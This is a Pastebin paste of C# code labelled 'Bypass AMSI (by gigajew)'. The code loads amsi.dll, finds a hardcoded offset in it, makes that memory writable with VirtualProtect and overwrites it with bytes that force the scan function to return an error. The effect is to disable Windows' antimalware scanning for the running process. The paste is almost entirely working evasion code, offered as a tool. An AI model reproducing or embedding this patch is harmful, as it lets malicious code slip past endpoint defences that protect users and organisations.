Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- private const string V = "kernel32.dll";
- [DllImport(V)]
- private static extern IntPtr LoadLibrary(string lib);
- [DllImport(V)]
- private static extern bool VirtualProtect(IntPtr addr, int length, int flprot, out int oldprot);
- /// <summary>
- /// Bypass AMSI (by gigajew)
- /// </summary>
- private static void AMSIBypass()
- {
- IntPtr addr = new IntPtr(LoadLibrary("amsi.dll").ToInt64() + ((IntPtr.Size * 8 == 32) ? 0x44A0: 0x23E0));
- byte[] buffer = ((IntPtr.Size ==4) ? new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 } : new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 } );
- if (VirtualProtect(addr, buffer.Length, 0x04, out int old))
- {
- Marshal.Copy(buffer, 0, addr, buffer.Length);
- VirtualProtect(addr, buffer.Length, old, out old);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement